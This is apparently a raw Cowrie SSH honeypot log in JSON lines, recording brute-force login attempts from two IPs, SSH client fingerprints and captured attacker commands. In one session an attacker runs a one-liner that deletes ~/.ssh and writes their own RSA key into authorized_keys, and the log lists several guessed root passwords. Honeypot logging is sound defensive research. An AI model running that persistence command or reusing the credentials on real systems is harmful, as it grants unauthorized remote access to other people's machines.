{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:20:54.816734Z","src_ip":"217.154.1.158","session":"6a18506518a0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:20:55.228049Z","src_ip":"212.227.235.229","session":"aa3d18b62134"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57728,"dst_ip":"1.2.3.4","dst_port":22,"session":"e43b6a753406","protocol":"ssh","message":"New connection: 212.227.235.229:57728 (1.2.3.4:22) [session: e43b6a753406]","sensor":"my-vps","timestamp":"2025-08-26T19:20:55.484279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:20:55.488203Z","src_ip":"212.227.235.229","session":"e43b6a753406"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:20:55.741156Z","src_ip":"212.227.235.229","session":"e43b6a753406"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:20:56.760734Z","src_ip":"212.227.235.229","session":"e43b6a753406"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:20:57.009575Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:20:57.016469Z","src_ip":"212.227.235.229","session":"e43b6a753406"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52758,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b93b9e31e48","protocol":"ssh","message":"New connection: 217.154.1.158:52758 (1.2.3.4:22) [session: 6b93b9e31e48]","sensor":"my-vps","timestamp":"2025-08-26T19:21:11.195879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:21:11.197591Z","src_ip":"217.154.1.158","session":"6b93b9e31e48"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:21:11.212130Z","src_ip":"217.154.1.158","session":"6b93b9e31e48"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-26T19:21:11.257065Z","src_ip":"217.154.1.158","session":"6b93b9e31e48"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:21:12.278209Z","src_ip":"217.154.1.158","session":"6b93b9e31e48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42487,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e3860d2e4a7","protocol":"ssh","message":"New connection: 212.227.235.229:42487 (1.2.3.4:22) [session: 2e3860d2e4a7]","sensor":"my-vps","timestamp":"2025-08-26T19:21:13.388831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:21:13.391443Z","src_ip":"212.227.235.229","session":"2e3860d2e4a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:21:13.863296Z","src_ip":"212.227.235.229","session":"2e3860d2e4a7"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:21:15.393319Z","src_ip":"212.227.235.229","session":"2e3860d2e4a7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":58590,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc0bef707fd4","protocol":"ssh","message":"New connection: 217.154.1.158:58590 (1.2.3.4:22) [session: dc0bef707fd4]","sensor":"my-vps","timestamp":"2025-08-26T19:21:28.625621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:21:28.626576Z","src_ip":"217.154.1.158","session":"dc0bef707fd4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:21:28.640509Z","src_ip":"217.154.1.158","session":"dc0bef707fd4"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:21:28.749747Z","src_ip":"217.154.1.158","session":"dc0bef707fd4"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:21:29.770597Z","src_ip":"217.154.1.158","session":"dc0bef707fd4"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51424,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ecffa18e7be","protocol":"ssh","message":"New connection: 217.154.1.158:51424 (1.2.3.4:22) [session: 6ecffa18e7be]","sensor":"my-vps","timestamp":"2025-08-26T19:21:46.238682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:21:46.240077Z","src_ip":"217.154.1.158","session":"6ecffa18e7be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:21:46.255263Z","src_ip":"217.154.1.158","session":"6ecffa18e7be"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:21:46.300971Z","src_ip":"217.154.1.158","session":"6ecffa18e7be"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:21:46.348719Z","src_ip":"217.154.1.158","session":"6ecffa18e7be"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:21:46.349391Z","src_ip":"217.154.1.158","session":"6ecffa18e7be"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:21:46.364666Z","src_ip":"217.154.1.158","session":"6ecffa18e7be"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:21:46.365701Z","src_ip":"217.154.1.158","session":"6ecffa18e7be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40941,"dst_ip":"1.2.3.4","dst_port":22,"session":"22419fde8b06","protocol":"ssh","message":"New connection: 212.227.235.229:40941 (1.2.3.4:22) [session: 22419fde8b06]","sensor":"my-vps","timestamp":"2025-08-26T19:21:58.386799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:21:58.387784Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:21:58.636173Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa135246","message":"login attempt [root/Aa135246] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:21:59.666067Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:22:00.264748Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:22:00.265667Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:22:00.266526Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:00.514766Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:22:01.108153Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:22:01.108892Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:22:01.362076Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:01.363152Z","src_ip":"212.227.235.229","session":"22419fde8b06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41673,"dst_ip":"1.2.3.4","dst_port":22,"session":"525b72544f47","protocol":"ssh","message":"New connection: 212.227.235.229:41673 (1.2.3.4:22) [session: 525b72544f47]","sensor":"my-vps","timestamp":"2025-08-26T19:22:01.614791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:22:01.621935Z","src_ip":"212.227.235.229","session":"525b72544f47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:22:01.871119Z","src_ip":"212.227.235.229","session":"525b72544f47"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:22:02.881183Z","src_ip":"212.227.235.229","session":"525b72544f47"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":53504,"dst_ip":"1.2.3.4","dst_port":22,"session":"792774a27742","protocol":"ssh","message":"New connection: 217.154.1.158:53504 (1.2.3.4:22) [session: 792774a27742]","sensor":"my-vps","timestamp":"2025-08-26T19:22:03.762714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:22:03.763524Z","src_ip":"217.154.1.158","session":"792774a27742"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:22:03.778062Z","src_ip":"217.154.1.158","session":"792774a27742"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-26T19:22:03.823517Z","src_ip":"217.154.1.158","session":"792774a27742"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:22:04.143635Z","src_ip":"212.227.235.229","session":"525b72544f47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42191,"dst_ip":"1.2.3.4","dst_port":22,"session":"98aaa1d075fd","protocol":"ssh","message":"New connection: 212.227.235.229:42191 (1.2.3.4:22) [session: 98aaa1d075fd]","sensor":"my-vps","timestamp":"2025-08-26T19:22:04.388092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:22:04.388950Z","src_ip":"212.227.235.229","session":"98aaa1d075fd"}
